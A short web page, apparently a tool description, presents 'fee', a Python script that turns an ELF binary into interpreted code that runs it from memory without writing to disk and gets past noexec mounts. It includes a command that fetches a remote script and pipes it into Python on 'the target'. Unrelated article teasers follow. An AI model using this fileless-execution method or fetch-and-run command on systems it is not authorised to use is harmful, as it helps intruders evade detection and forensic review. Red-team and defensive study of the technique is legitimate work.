This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs).
This makes it possible to execute binaries without leaving traces on the disk.
The technique used for this is explained here.
With default options for each interpreter, running binaries using fee does not write to disk whatsoever. This can be verified using tools such as strace.
fee also completely ignores and bypasses noexec mount flags, even if they were set on /proc.
memfd_create support)Install this on your host machine using pipx:
$ pipx install fee … or regular pip:
$ pip install --user fee You may also clone this repository and run the script directly.
Basic usage: supply the path to the binary you wish to drop:
$ fee /path/to/binary > output.py You can then pipe this into Python on the target:
$ curl my.example.site/output.py | python For more information click here.
Learning Without Walls Remote education has long been a lifeline for students in rural areas…
Have you ever come across a picture on the internet and wondered where it came…
Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…
Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…
Efficient disk space management is vital in Linux, especially for system administrators who manage servers…
Knowing how to check directory sizes in Linux is essential for managing disk space and…